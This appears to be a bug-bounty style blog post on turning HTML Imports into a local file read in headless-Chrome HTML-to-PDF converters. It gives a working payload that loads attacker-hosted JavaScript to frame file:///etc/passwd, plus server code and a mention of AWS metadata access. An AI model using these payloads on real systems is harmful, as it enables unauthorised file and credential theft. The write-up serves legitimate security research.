Intro

You’ve probably already heard about many different ways to exploit HTML-to-PDF converters and access sensitive info: you can try to <iframe> AWS’s 169.254.169.254 IP and read that sweet, sweet metadata. Didn’t work? Inject a <script> tag and use JavaScript. Filtered, too? Maybe try a <link> with a rel="attachment" attribute and attach a sensitive file to the PDF. No? At least use an <img> to send GET requests to internal hosts or fingerprint them using their favicons?

Recently, I ran into a scenario where all of these HTML tags were correctly filtered, and none of the methods/bypasses/encodings I tried seemed to work.

How the App Worked

The feature I was testing was some kind of contact form. You can customize the look and feel of your form using a rich text editor, and when the form gets a response, you can download it as a PDF. After looking at the app a bit more in-depth, I noticed a few things:

  • The text editor uses HTML to format text, embed images, etc. But there is a whitelist allowing only a few innocuous HTML tags.
  • <img> is one of the allowed tags, so I used it to send a request to my collaborator server and fingerprint the converter based on the User-Agent header. It was headless Chrome.
  • You can attach arbitrary attributes to whitelisted HTML tags as long as the attributes aren’t JS event handlers, i.e. anything starting with “on”, like onload. So <img onload> isn’t allowed, but <img whatever> is.
  • One of the allowed HTML tags is <link> which is used for styling purposes.
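
To make the observations above concrete, here is a minimal sketch of how a filter with this behavior might work. I never saw the app's actual code, so the function name, the tag list, and the matching logic are all assumptions for illustration; the sketch only reproduces what I could observe from the outside.

```javascript
// Hypothetical re-creation of the filter's observable behavior.
// The real implementation and its exact tag list are unknown.
const ALLOWED_TAGS = new Set(['b', 'i', 'p', 'img', 'link']); // assumed list

// Returns true when a tag with the given attribute names would pass the filter.
function passesFilter(tagName, attributeNames) {
  if (!ALLOWED_TAGS.has(tagName.toLowerCase())) {
    return false;
  }
  // Only attributes that look like event handlers ("on...") are rejected.
  return attributeNames.every((name) => !name.toLowerCase().startsWith('on'));
}

console.log(passesFilter('img', ['src', 'onload']));   // false
console.log(passesFilter('img', ['src', 'whatever'])); // true
console.log(passesFilter('link', ['rel', 'href']));    // true
console.log(passesFilter('script', []));               // false
```

The point is that a filter like this inspects attribute names but not attribute values, so a <link> with any rel value goes through untouched.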

I set up an HTTP server and used HTTPLeaks to determine if any of the allowed HTML tags could be used to do anything interesting. One of the few vectors that triggered an HTTP request was <link rel="import" href="https://leaking.via/link-import"/>, aka HTML Imports.

HTML Imports 101

According to the W3C draft, “HTML Imports are HTML documents that are linked as external resources from another HTML document”. It’s a relatively new HTML feature that was created to allow developers to bundle HTML/JS/CSS resources into a single file. From a security perspective, one of the most interesting features of HTML Imports is that an import can execute JavaScript code and access the DOM of the page that’s importing it.

HTML imports can be defined using the following syntax:

<link rel="import" href="/import.html">

It’s important to note that as of 2021, the HTML imports feature has been deprecated and removed from Chrome, so this technique only works on Chrome versions before 80.
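
Since the converter leaks its User-Agent on outgoing requests, the version constraint can be checked before spending time on a payload. The following is a rough sketch, not a robust parser: the function names are made up, the sample User-Agent string is invented for illustration, and a User-Agent can of course be spoofed or customized.

```javascript
// Extracts the Chrome major version from a User-Agent string, or null.
// Matches both "Chrome/NN." and "HeadlessChrome/NN.".
function chromeMajorVersion(userAgent) {
  const match = /Chrome\/(\d+)\./.exec(userAgent);
  return match ? Number(match[1]) : null;
}

// HTML Imports were removed in Chrome 80, so only older versions qualify.
function mightSupportHtmlImports(userAgent) {
  const major = chromeMajorVersion(userAgent);
  return major !== null && major < 80;
}

// Example User-Agent value (made up for illustration).
const sampleUa =
  'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ' +
  'HeadlessChrome/79.0.3945.0 Safari/537.36';

console.log(chromeMajorVersion(sampleUa));      // 79
console.log(mightSupportHtmlImports(sampleUa)); // true
```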

Exploitation

You’ve probably guessed where this is going. The most straightforward way to exploit an HTML-to-PDF converter is using an <iframe>, and if it’s filtered, we can use a <script> and create the iframe using JavaScript. What if <script> and all the other methods of executing JavaScript are also filtered? Use a seemingly innocent <link> tag to import an HTML file that runs your JavaScript code.

The payload looked like this:

<link rel="import" href="http://[my_server]/import.html">

And on my server, I enabled CORS and hosted a payload that created an <iframe> pointing at /etc/passwd:

<script>
  // Runs in the context of the importing page, not the import itself
  var iframe = document.createElement('iframe');
  iframe.height = 1000;
  iframe.width = 1000;
  iframe.src = "file:///etc/passwd";

  document.body.appendChild(iframe);
</script>

Note: document here references the main document that’s importing the file. To access the import document itself, you can use document.currentScript.ownerDocument.
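
For the server side, something along these lines should be enough. This is a sketch under my own assumptions rather than the exact setup I used: it uses Node's built-in http module, the port is arbitrary, and the handler and function names are made up. The one part that matters is the Access-Control-Allow-Origin header, because cross-origin imports are fetched with CORS.

```javascript
const http = require('http');

// Same payload as above: runs in the importing document and frames a local file.
const IMPORT_BODY = `<script>
  var iframe = document.createElement('iframe');
  iframe.height = 1000;
  iframe.width = 1000;
  iframe.src = "file:///etc/passwd";
  document.body.appendChild(iframe);
</script>`;

// Serves the import on /import.html with a permissive CORS header.
function handleRequest(req, res) {
  if (req.url !== '/import.html') {
    res.writeHead(404, { 'Content-Type': 'text/plain' });
    res.end('not found');
    return;
  }
  res.writeHead(200, {
    'Content-Type': 'text/html',
    // Without this header the cross-origin import is blocked.
    'Access-Control-Allow-Origin': '*',
  });
  res.end(IMPORT_BODY);
}

// Port 8000 is an arbitrary choice for this sketch.
function startServer(port = 8000) {
  return http.createServer(handleRequest).listen(port);
}
```

Calling startServer() and pointing the href of the <link rel="import"> at that host should serve the payload to the converter.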

To test this locally, you can install a Chrome version older than 80 and use this command to generate a PDF:

google-chrome-stable --headless --print-to-pdf import.html

Conclusion

It’s useful to read the specs and RFCs behind the technologies that you’re trying to break. You will often find interesting behavior that leads to more exploits and bypasses. Although the HTML Imports feature has been removed from newer versions of Chrome, this technique might still come in handy, since older versions are still used in the wild.